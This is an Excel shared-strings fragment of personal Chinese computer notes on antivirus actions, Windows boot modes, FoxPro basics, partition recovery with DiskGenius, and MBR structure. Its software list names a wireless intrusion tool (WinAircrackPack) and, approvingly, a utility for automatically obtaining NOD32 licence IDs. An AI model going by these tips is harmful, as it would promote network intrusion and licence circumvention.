    <t xml:space="preserve">   当然，并不是所有的威胁都能“修复”，因为有些病毒对文件的修改非常大，已有的规则已经不能判断正常的文件应该是怎样的了；杀毒软件无法将其修复好，就不能选择修复了，而只能是删除被感染的文件，这也就是“删除”操作。当然，有时是发现了病毒文件，而非病毒被修改的文件，这时的操作自然是删除。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    而如果病毒正在运行，或者它的权限更高，杀毒软件无法修复或删除成功，就只能让先把可疑的文件限制起来，把它转移到一个目录下，同时禁止它运行，这也就是“隔离”操作。当然，还有“不处理”，“离开”，“忽略”这样的操作，这就是当杀毒软件发现的威胁是我们确认的安全文件时，我们不需要杀毒软件进行处理，保持原样即可。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    另外，诺现了而还会所“排除”放在操作之列，意思是这个文件是安全的，以后不要扫描了，排除在危险文件之外；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>病毒修复、删除、隔离</t>
  </si>
  <si>
    <t>病毒修复、删除、隔离</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>上标：ctrl+shift+"+",再按一次可恢复；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word内表格宽度的调整</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在标尺位置进行调整（影响整个表格宽度）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在内容区调整，是相邻位置的相互增减；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>粘贴回excel调整成一页宽，再粘贴回word;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word表格内的数据按小数点对齐数字</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>双击技巧</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>双击标尺空白处可以弹出“页面设置”对话框；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>双击状态栏的空白处：查找与替换；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>双击标题栏空白处：可使窗口最大化；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>以一组最少的驱动程序和服务启动 Windows。可查看加载的驱动和系统服务；local machine\system\current controlset\control\safeboot；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在安全模式下启动 Windows，包括访问 Internet 或网络上的其他计算机所需的网络驱动程序和服务。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>少了一个网卡驱动，将GUI更改为命令提示符界面；使用安全模式下的命令提示符窗口启动 Windows，而不是通过一般的 Windows 界面启动。此选项适用于 IT 专业人士和管理员。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>正常启动并创建了一个Ntbtlog.txt的日志文件；（包括正常启动时加载的驱动，和无法正常启动的驱动）；创建文件 ntbtlog.txt，该文件列出所有在启动过程安装并可能对高级疑难解答非常有用的驱动程序。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用当前视频驱动程序和低分辨率及刷新率设置启动 Windows。可以使用此模式重置显示设置。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用最后一次正常运行的注册表和驱动程序配置启动 Windows。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>启动运行 Active Directory 的 Windows 域控制器，以便可以还原目录服务。此选项适用于 IT 专业人士和管理员。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>因错误导致 Windows 失败时，阻止 Windows 自动重新启动。仅当 Windows 陷入循环状态时，即 Windows 启动失败，重新启动后再次失败，使用此选项。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>以供 IT 专业人员和系统管理员使用的高级疑难解答模式启动 Windows。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>允许安装包含了不恰当签名的驱动程序。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显示可以用于修复启动问题的系统恢复工具的列表，运行诊断或恢复系统。此选项仅在计算机硬盘上安装了这些工具之后才可用。如果具有 Windows 安装光盘，则系统恢复工具位于该光盘上。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>以下模式启动windows;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>当我们打开计算机并在Windows启动之前按 F8 键，都会进入“高级引导选项”屏幕，使您能够以高级疑难解答模式启动Windows，从而可以有效解决在正常启动进入Windows而不能解决的问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>程序设计基础</t>
  </si>
  <si>
    <t>从功能上看，程序可分为3总分</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.1 程序的说明部分；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2 程序的数据处理部分；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.3 程序的控制返回部分</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2.1 提供原始数据部分；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2.2 数据处理部分</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2.3 输出结果部分；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>程序的注释命令：Note,*,&amp;&amp;;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>输入命令：input,accept,wait;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>输出命令：？，？？，text,@&lt;行，列&gt; say&lt;表达式&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>程序的基本结构：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>if,</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>do case,</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>基于条件的循环：do while:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>基于计数的循环：for to step:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>基于表的循环：scan for while:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>模块的调用：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>应用程序一般都是多模块程序，可包含多个程序模块。模块是一个相对独立的程序段，它可以被其他模块所调用，也可以去调用其他的模块。通常，把被其他模块调用的模块称为子程序，把调用其他模块而没有被其他模块调用的模块称为主程序；模块化便于程序的开发、阅读、维护，同时也有利于系统的运行效率的提高；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>程序设计基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.1顺序结构：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.2选择结构：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.3循环结构：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>程序文件又叫命令文件，程序是指能够完成一定任务的命令序列集合；当程序运行时，系统就会按照一定的次序自动执行包含在程序文件中的命令；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一个应用程序通常都是由一个主程序和若干个子程序组成。所谓子程序是相对于主程序而言的一个独立的程序文件，可以单独执行，也可以被其他程序调用。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENDPROC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>过程：过程是一个由</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="仿宋"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>PROCEDURE&lt;过程名&gt;开头，ENDPROC结尾的子程序段。过程可以将实现相对独立功能的常用代码集中在一起，供应用程序在需要时调用。过程的存在格式如下所示：</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PROCEDURE&lt;</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="仿宋"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过程名&gt;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>[&lt;</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="仿宋"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>语句序列&gt;]</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>程序的书写规则：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">命令分行 ：命令都以回车键结尾，一行只能写一条命令，若写不下，可在未写完的本行末尾添加一个分号“；”作为下一行的继行标志。 </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">                          </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>程序注释语句   NOTE/*</t>
    </r>
    <r>
      <rPr>
        <shadow/>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>：对程序的结构或功能进行注释。程序执行时将跨过注释语句，不作任何操作。</t>
    </r>
    <r>
      <rPr>
        <shadow/>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <shadow/>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>语句注释</t>
    </r>
    <r>
      <rPr>
        <shadow/>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">  &amp;&amp;</t>
    </r>
    <r>
      <rPr>
        <shadow/>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>：在语句行末尾注释，对当前语句进行说明。程序执行时，对</t>
    </r>
    <r>
      <rPr>
        <shadow/>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>&amp;&amp;</t>
    </r>
    <r>
      <rPr>
        <shadow/>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>后面的注释不作任何操作</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>过程文件:是由若干个过程构成的文件。过程必须存放在一个过程文件中。不能把可执行的主程序代码放在过程之后。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VF</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘分区、数据丢失、恢复的经历</t>
  </si>
  <si>
    <t>硬盘分区、数据丢失、恢复的经历</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用Easy Recovery\Final Data等数据恢复软件时，恢复目录杂乱无章，大部分文件无法打开，一部分能打开的文件也有部分数据不完整；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用Acronis Dis Director 11进行分区合并时失败，两个分区打开时提示需格式化；版本10的增加分区空间感觉比11的好用，但10没有合并分区的功能；（合并分区失败的原因a.可能操作方法不当，即一个分区的空间不够，造成分区表丢失；b.因为硬盘近段时间一直有提示有问题，提示需及时备份数据；）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用Disk Genius：工具---搜索已丢失的分区（重建分区表）：a 搜索范围：整个硬盘；b 搜索方式：高级方式，高级方式选项：按柱面（所需时间较短，也可以按扇面，但时间较长）搜索到的分区有的是未格式化分区，有的是还存在的分区，有的是已丢失的分区；当我对未格式的分区都选择保留而不是忽略时，整个搜索看到了两个丢失的分区之一wwu分区；全部文件存在且完整，可全部恢复；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>当时我未急着通过复制去抢救数据，因为我没有那么多剩余的备份空间；通过浏览www.diskgenius.cn后了解到，其实在搜索到相关的分区后，是可以选择保存分区表的；但可以存在需重装系统的风险；不入虎穴，焉得虎子；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用WIN7安装盘无法修复；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>再次启动DG，工具---搜索已丢失的分区，保留了三个分区，一个是无数据的分区（overall)，另两个是已丢失分区（wwu和MIV）---保存分区表---即时蓝屏；---无法重启；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用WIN7安装盘进行自定义、格式化并安装到overall分区（在选择分区时发现有一个100G左右的未知分区，WWU和MIV都还在）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>再次运行DG，未格式化分区全部忽略，需保留的分区全部保留，八个分区全部找到，再次执行保存分区表；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在硬盘中已有安装三个系统：win\win7\overall，win无启动菜单条，overall启动即崩溃，win7在启动时经过长时间的自我修复后可启动；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用NTBOOTautofix v2.0.2.exe修复工具修复启动菜单，三个系统都可供选择启动，但仍只有WIN7可启动，另两个系统一启动时即崩溃；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>后面overall盘的系统又可启动，只是启动时间很慢；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>再次新装系统到WIN，overall盘格式化，再次启用Acronis Dis Director 10把overall的加到其它分区，但仍提示因磁盘损坏，无法增加分区空间；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>只得保留overall分区，但把其部分空间用系统自带管理工具扩展到另一分区；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>启示；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>磁盘分区操作又可能丢失数据，特别是当本身硬盘存在问题时，更要民愤谨慎操作；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对全部数据，需反问，此数据可以允许丢失吗？否则需备份；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在数据恢复前最优是先对硬盘不做任何操作，具备份到移动硬盘；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>我此次出现的是分区合并失败，应该是分区表丢失，所以对硬盘除了数据备份外，分区表也就做备份；另外，对于分区表的丢失，DG确实好用；如果是格式化或alt+del类的数据删除，可能用其他数据恢复软件操作具有优势；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>杀、控、防、优化</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>diskGenius</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>www.diskgenius.cn</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对分区表恢复具有独特优势；绿色，免费</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NTBOOTautofix v2.0.2.exe</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>多重系统，当启动选择条丢失时，可供修复；win+R---msconfig---启动；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>定时自动开关机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ViDown视频下载</t>
  </si>
  <si>
    <t>ViDown</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FFSetup(格式工厂)</t>
  </si>
  <si>
    <t>FFSetup</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>e-PDFToWordConverterPDF转换成WordV2.0.0.151绿色汉化版</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PDFToWordConverter</t>
  </si>
  <si>
    <t>GoogleEarth</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中国电子地图2008</t>
  </si>
  <si>
    <t>migwiz</t>
  </si>
  <si>
    <t>windows轻松传送，系统、软件配置和文件的轻松传送；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>snagit</t>
  </si>
  <si>
    <t>抓图软件；（用alt或ctrl+prtsc sysrq抓图，后可打开mspaint，ctrl+c;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无线网络的管理分析和扫描v1·22008110600汉化安装版软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WiFiHopper</t>
  </si>
  <si>
    <t>Networkstumbler0.4554汉化绿色版</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Networkstumbler</t>
  </si>
  <si>
    <t>无线网络入侵工具060512WinAircrackPack</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WinAircrackPack</t>
  </si>
  <si>
    <t>freeime</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>极点五笔，较好用的还有海峰五笔；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ESET_VC52_AUTOID</t>
  </si>
  <si>
    <t>自动获取NOD的ID号工具；NOD一款较好的杀毒软件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AdobeReader9·0简体中文版</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PDF文件阅读软件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ultra iso9_cn</t>
  </si>
  <si>
    <t>较好的启动ISO文件制作软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ACDSee</t>
  </si>
  <si>
    <t>看图软件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ESET NOD32 Antivirus\thunder、office 2010\QQ、OE、MSN、联众、PS、DW、CAD、KM ro Realplayer;Acronis Disk Director、优化大师、Nero、Everest;UltraISO、antiARP防火墙、金山词霸、酷我音乐盒、;ourgame,</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>杀毒软件如何辨忠奸</t>
  </si>
  <si>
    <t>杀毒软件如何辨忠奸</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>特征码查杀：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检测文件的二进制代码是否含有危险特征的代码，杀毒软件拥有自己的病毒库；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>启发式查毒：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对文件进行反编译，判断时面包含的代码会有什么行为，如果这样，然后它会怎样？这样就能分析出文件的真正动机，判断其是否为病毒。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>行为监控：对一些操作根据对系统的影响，杀毒软件询问用户；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>杀毒软件就是以上几种技术的综合；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件删除的秘密：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>backup:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>yes</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一个可使用的硬盘通常罕有文件分配表、目录区和数据区；如果是安装了系统的硬盘，还包含有引导记录区；当我们要存储一个文件时，系统首先查看文件分配表为其安排合适的文件存储位置，并存储到对应的数据区中，然后再将其名称、大小先决以目录区中，当要删除一个文件时，系统只是删除目录区和分配表中的相关文件信息，新的数据会自动被删除的数据，这是为了减少磁盘动作，延长磁盘寿命；分区格式化也只是对分区、目录、DIR区进行了改变，而DATA区并没有做任何改动.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows系统的MBR磁盘的分区和动态磁盘的卷</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MBR磁盘按分区管理，MS-DOS分区；而动态磁盘按卷管理；由LDM（Logic Disk Manage)维护一个单独的数据库来存储系统动态卷的分区信息，保存于每个动态盘最后的1MB中；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>动态磁盘由三部分结构组成：1 MBR分区，与MBR磁盘一样；2 LDM软分区区域；3 LDM数据库区域（保存于每个动态盘最后的1MB中）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 windows MBR硬盘的逻辑结构</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a 引导程序，440B；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>d Boot Record ID:引导区标记(结束标志：55AA）：2B；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>引导标志boot indicator,指明分区是否是活动分区；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>开始磁头start head;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>起始扇区start sector;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>起始柱面start cylinder;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分区表的类型描述；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>结束磁头</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>结束扇区</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>结束柱面</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>本分区之前使用的扇区数；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分区的总扇区数；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MBR(main Boot Record)主引导分区：位置：0</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>磁道</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>柱面</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>扇区</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，大小：512B；由分区程序产生（如Fdisk.exe);</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>b windows磁盘签名，4B，如果没有，则会提示硬盘未初始化，不能使用；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MBR的分区表仅为64个字节，每个分区的中16个字节，所以MBR盲区中可存储4个分区表项的数据，最多3个</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>主磁盘分区和1个扩展分区</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（可包含多个逻辑驱动器）；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>EBR Extend Boot Record类似MBR，存储</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>扩展分区中</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>每个</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>逻辑驱动器</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>的分区信息，只包括分区表和结束标志55AA，没有引导代码部分；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>硬盘分区：可分为主分区、扩展分区、逻辑分区，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>主分区</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>是硬盘的启动分区，用来存放OS的引导记录和OS文件，若要在硬盘上安装OS，则必须有一个主分区，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>扩展分区</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>是主分区以外的分区，它必须划分为若干</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>逻辑分区</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>才可以使用，在一块硬盘中，主分区最多有4个，最少一个；扩展分区最多只能有一个，也可没有，逻辑分区没什么限制，主分区+扩展分区不能超过4个；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分区表项含义（以下数字后面的单位是B）：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Partion Margic</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>也叫分区魔术师，是一款很好的无损分区软件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>按下主机电源，电源就开始向主板和其他设备供电，在开机瞬间，电压不是很稳定，主板上的芯片组会向CPU发出并保持一个Reset信号，让CPU内部自动恢复到初始状态，当芯片组检测到电源开始稳定供电时，便撤出重置信号，CPU马上从FFFFFOH处执行指令，准备执行系统BIOS程序；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>读取CMOS设置，以便知道有哪些设备可以启动？BIOS根据用户指定的启动顺序从软盘、硬盘、或光驱启动；（假设设置为从硬盘启动）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>查找完其它设备的BIOS后，系统BIOS将显示出它自己的启动画面，包括系统的BIOS类型、序列号和版本号；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统BIOS载入硬盘的MBR分区；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统BIOS查找显卡BIOS，屏幕会有一些初始化的信息显示；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬件检测；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作系统核心开始初始化，载入各种硬件信息，并由session manager启动windows XP的各项服务、输入输出设备。接下来，windows系统即启动成功；</t>
